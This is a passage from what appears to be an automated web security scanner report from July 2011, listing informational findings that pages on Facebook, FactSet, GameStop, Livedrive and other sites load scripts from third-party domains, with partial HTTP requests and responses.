The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.62. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.63. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.64. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/xEum5LcO_2g.js
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/g6Uyl7p4qHX.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js

Request

Response

21.65. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.66. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.67. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.68. http://www.factset.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

21.69. http://www.factset.com/events previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/events

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /events HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/privateequity
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"; __switchTo5x=61; __unam=301c176-13142cac1d6-364e5fca-2

Response

21.70. http://www.factset.com/images/searchInputBg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/images/searchInputBg.gif

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /images/searchInputBg.gif HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/portal_css/Plone%20Default/ploneStyles0867.css
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

21.71. http://www.factset.com/products/im previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/products/im

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/button/buttons.js
https://ssl.google-analytics.com/urchin.js

Request

GET /products/im HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"

Response

21.72. http://www.factset.com/products/im/img/im/title_1_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/products/im/img/im/title_1_2.png

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /products/im/img/im/title_1_2.png HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"

Response

21.73. http://www.factset.com/products/privateequity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/products/privateequity

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/button/buttons.js
https://ssl.google-analytics.com/urchin.js

Request

GET /products/privateequity HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"; __switchTo5x=61; __unam=301c176-13142cac1d6-364e5fca-1

Response

21.74. http://www.fansnap.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fansnap.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

21.75. http://www.fansnap.com/developers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fansnap.com
Path:	/developers

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

21.76. http://www.fastteks.com/TechSolutions/News.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fastteks.com
Path:	/TechSolutions/News.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://platform.twitter.com/widgets.js

Request

GET /TechSolutions/News.aspx HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.4.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:03:42 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 399254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<div id="ctl00_ContentWindow_MainContentRegion_MainRegionId">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1">
</script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

21.77. http://www.gamestop.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=C07583&auto=t

Request

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:02:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:25 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,3375,4265,4151,4287,4300,3852,3362,4228,4227,4226,3383; path=/
Set-Cookie: CactusState=V=1; path=/
Content-Length: 317495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
 <script src="//js.revsci.net/gateway/gw.js?csid=C07583&auto=t"></script>
...[SNIP]...

21.78. http://www.googlelabs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlelabs.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: www.googlelabs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

21.79. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intelex.com
Path:	/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://lct.salesforce.com/sfga.js
http://s7.addthis.com/js/250/addthis_widget.js
http://static.getclicky.com/js

Request

Response

21.80. http://www.intelex.com/landing/~/script/highslide/highslide.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intelex.com
Path:	/landing/~/script/highslide/highslide.css

Issue detail

The response dynamically includes the following scripts from other domains:

http://lct.salesforce.com/sfga.js
http://s7.addthis.com/js/250/addthis_widget.js
http://static.getclicky.com/js

Request

GET /landing/~/script/highslide/highslide.css HTTP/1.1
Host: www.intelex.com
Proxy-Connection: keep-alive
Referer: http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gflees54rii1f3o3ejpcx3m0

Response

21.81. http://www.livedrive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livedrive.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://apis.google.com/js/plusone.js

Request

GET / HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; market=US; __utmz=9305512.1308880525.1.1.utmcsr=livedrive.com|utmccn=(referral)|utmcmd=referral|utmcct=/Login; __utma=9305512.1214018352.1308880525.1308880525.1308880525.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:24:13 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 103
Date: Tue, 19 Jul 2011 12:24:12 GMT
Connection: close
Content-Length: 18913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

Online Storage & Onli
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

21.82. http://www.livedrive.com/ForHome/ProSuite previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livedrive.com
Path:	/ForHome/ProSuite

Issue detail

The response dynamically includes the following script from another domain:

https://apis.google.com/js/plusone.js

Request

GET /ForHome/ProSuite HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; market=US; __utma=1.1954624592.1311078246.1311078246.1311078246.1; __utmb=1.1.10.1311078246; __utmc=1; __utmz=1.1311078246.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rotateProductNavPane=7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:23:11 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:23:11 GMT
Connection: close
Content-Length: 25322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

Livedrive Pro suite-
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

21.83. http://www.livedrive.com/SignupToLivedrive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livedrive.com
Path:	/SignupToLivedrive

Issue detail

The response dynamically includes the following script from another domain:

https://apis.google.com/js/plusone.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:23:33 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:23:33 GMT
Connection: close
Content-Length: 19197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

Sign up for Livedrive
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

21.84. http://www.mavitunasecurity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavitunasecurity.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://asset0.zendesk.com/external/zenbox/v2.1/zenbox.js
http://static.getclicky.com/js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11213
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><title>
   N
...[SNIP]...
</script>
   <script src="//static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/v2.1/zenbox.js"></script>
...[SNIP]...

21.85. http://www.mavitunasecurity.com/blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavitunasecurity.com
Path:	/blog/

Issue detail

The response dynamically includes the following scripts from other domains:

http://asset0.zendesk.com/external/zenbox/v2.1/zenbox.js
http://static.getclicky.com/js

Request

GET /blog/ HTTP/1.1
Host: www.mavitunasecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: msluuid=c326121b79864f4280400de74b423212; _jsuid=6701577914079939982; __utma=97172739.129174214.1311089909.1311089909.1311089909.1; __utmb=97172739.6.10.1311089909; __utmc=97172739; __utmz=97172739.1311089909.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22924
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:39:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><title>
   Netsparker, F
...[SNIP]...
</script>
   <script src="//static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/v2.1/zenbox.js"></script>
...[SNIP]...

21.86. http://www.myspace.com/auth/loginform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/auth/loginform

Issue detail

The response dynamically includes the following scripts from other domains:

http://cms.myspacecdn.com/cms/js/ad_wrapper0189.js
http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js
http://js.myspacecdn.com/modules/login/static/js/externalloginbundle_xbaqfwap.js

Request

Response

21.87. http://www.nne.aaa.com/en-nne/Pages/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nne.aaa.com
Path:	/en-nne/Pages/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://hits.convergetrack.com/Includes/CT.js

Request

Response

21.88. http://www.numarasoftware.com/welcome/service_desk.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.numarasoftware.com
Path:	/welcome/service_desk.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js

Request

Response

21.89. http://www.seapine.com/ttpro.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seapine.com
Path:	/ttpro.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
http://munchkin.marketo.net/munchkin.js
http://t4.trackalyzer.com/trackalyze.js
http://www.googleadservices.com/pagead/conversion.js

Request

Response

21.90. http://www.stubhub.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/

